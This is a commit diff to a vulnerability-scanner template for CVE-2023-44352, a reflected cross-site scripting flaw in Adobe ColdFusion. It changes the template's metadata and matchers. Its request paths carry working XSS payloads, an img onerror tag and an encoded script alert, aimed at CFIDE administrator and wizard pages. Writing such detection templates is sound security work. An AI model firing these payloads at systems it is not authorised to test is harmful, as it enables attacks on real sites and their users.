matcher update

projectdiscovery · Jan 30, 2024 · 7315f11 · 7315f11
1 parent a883174
commit 7315f11
Showing 1 changed file with 22 additions and 22 deletions.
diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml
@@ -1,13 +1,14 @@
 id: CVE-2023-44352
 
 info:
-  name: Adobe Coldfusion - Reflected Cross-Site Scripting
+  name: Adobe Coldfusion - Cross-Site Scripting
   author: pwnwithlove
   severity: medium
-  description: Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser
+  description: |
+    Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-44352
     - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-44352
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -17,11 +18,11 @@ info:
     epss-percentile: 0.23281
     cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
+    max-request: 8
+    verified: true
     vendor: Adobe
     product: Adobe ColdFusion
     shodan-query: http.component:"Adobe Coldfusion"
-    verified: true
   tags: cve,cve2023,coldfusion,adobe,xss
 
 variables:
@@ -30,28 +31,27 @@ variables:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
-      - "{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
-      - "{{BaseURL}}/{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm"
-      - "{{BaseURL}}//{{string}}\"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm"
-      - "{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm"
-      - "{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm"
-      - "{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
-      - "{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm"
+      - '{{BaseURL}}/{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
+      - '{{BaseURL}}//{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
+      - '{{BaseURL}}/{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm'
+      - '{{BaseURL}}//{{string}}"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm'
+      - '{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm'
+      - '{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/administrator/index.cfm'
+      - '{{BaseURL}}/{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
+      - '{{BaseURL}}//{{string}}%22>%3Cscript%3Ealert(document.domain)%3C/script%3E/..CFIDE/wizards/common/_authenticatewizarduser.cfm'
 
     stop-at-first-match: true
-    matchers-condition: or
+    matchers-condition: and
     matchers:
       - type: word
-        name: xss1
+        part: body
         words:
           - 'action="/{{string}}"><img src=a onerror=alert(document.domain)>'
-          - "ColdFusion"
-        condition: and
-
-      - type: word
-        name: xss2
-        words:
           - '"{{string}}"><script>alert(document.domain)</script>'
-          - "ColdFusion"
+        condition: or
+
+      - type: dsl
+        dsl:
+          - "contains(body, 'ColdFusion')"
+          - "contains(header, 'text/html')"
         condition: and